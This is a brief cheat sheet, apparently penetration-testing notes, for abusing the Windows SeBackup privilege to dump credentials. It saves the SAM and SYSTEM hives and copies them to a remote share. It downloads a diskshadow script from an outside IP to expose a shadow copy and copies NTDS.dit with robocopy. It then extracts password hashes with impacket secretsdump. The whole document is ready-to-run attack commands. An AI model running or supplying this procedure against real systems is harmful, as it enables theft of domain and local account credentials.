SeBackup / SeRestore - SAM/NTDS Dump

Quick local SAM/SYSTEM dump (when SeBackup is held)

cd c:\
mkdir temp
cd temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
copy sam,system \\TSCLIENT\share\

impacket-secretsdump -sam sam -system system local

diskshadow + robocopy for NTDS.dit

Create viper.dsh:

set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:

unix2dos viper.dsh

On the target:

iwr -uri http://10.13.31.108/viper.dsh -o viper.dsh
diskshadow /s viper.dsh
robocopy /b x:\windows\ntds . ntds.dit
reg save hklm\system c:\windows\temp\system

Then on Kali:

secretsdump.py -ntds ntds.dit -system system local